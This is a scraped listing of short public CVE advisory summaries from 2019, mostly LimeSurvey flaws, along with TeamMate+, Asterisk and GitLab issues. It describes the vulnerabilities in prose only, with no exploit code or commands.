CVE-2019-16175
A clickjacking vulnerability was found in Limesurvey before 3.17.14.
Source: CVE-2019-16175
[월:] 2019년 09월
CVE-2019-16180
CVE-2019-16180
Limesurvey before 3.17.14 allows remote attackers to bruteforce the login form and enumerate usernames when the LDAP authentication method is used.
Source: CVE-2019-16180
CVE-2019-16185
CVE-2019-16185
In Limesurvey before 3.17.14, admin users can view, update, or delete reserved menu entries without proper permissions.
Source: CVE-2019-16185
CVE-2019-16181
CVE-2019-16181
In Limesurvey before 3.17.14, admin users can mark other users’ notifications as read.
Source: CVE-2019-16181
CVE-2019-16184
CVE-2019-16184
A CSV injection vulnerability was found in Limesurvey before 3.17.14 that allows survey participants to inject commands via their survey responses that will be included in the export CSV file.
Source: CVE-2019-16184
CVE-2019-16182
CVE-2019-16182
A reflected cross-site scripting (XSS) vulnerability was found in Limesurvey before 3.17.14 that allows remote attackers to inject arbitrary web script or HTML via extensions of uploaded files.
Source: CVE-2019-16182
CVE-2019-10253
CVE-2019-10253
A Cross-Site Request Forgery (CSRF) vulnerability exists in TeamMate+ 21.0.0.0 that allows a remote attacker to modify application data (upload malicious/forged files on a TeamMate server, or replace existing uploaded files with malicious/forged files). The specific flaw exists within the handling of Upload/DomainObjectDocumentUpload.ashx requests because of failure to validate a CSRF token before handling a POST request.
Source: CVE-2019-10253
CVE-2019-15297
CVE-2019-15297
res_pjsip_t38 in Sangoma Asterisk 13.21-cert4, 15.7.3, and 16.5.0 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk.
Source: CVE-2019-15297
CVE-2019-6795
CVE-2019-6795
An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Insufficient Visual Distinction of Homoglyphs Presented to a User. IDN homographs and RTLO characters are rendered to unicode, which could be used for social engineering.
Source: CVE-2019-6795
CVE-2019-6792
CVE-2019-6792
An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Path Disclosure. When an error is encountered on project import, the error message will display instance internal information.
Source: CVE-2019-6792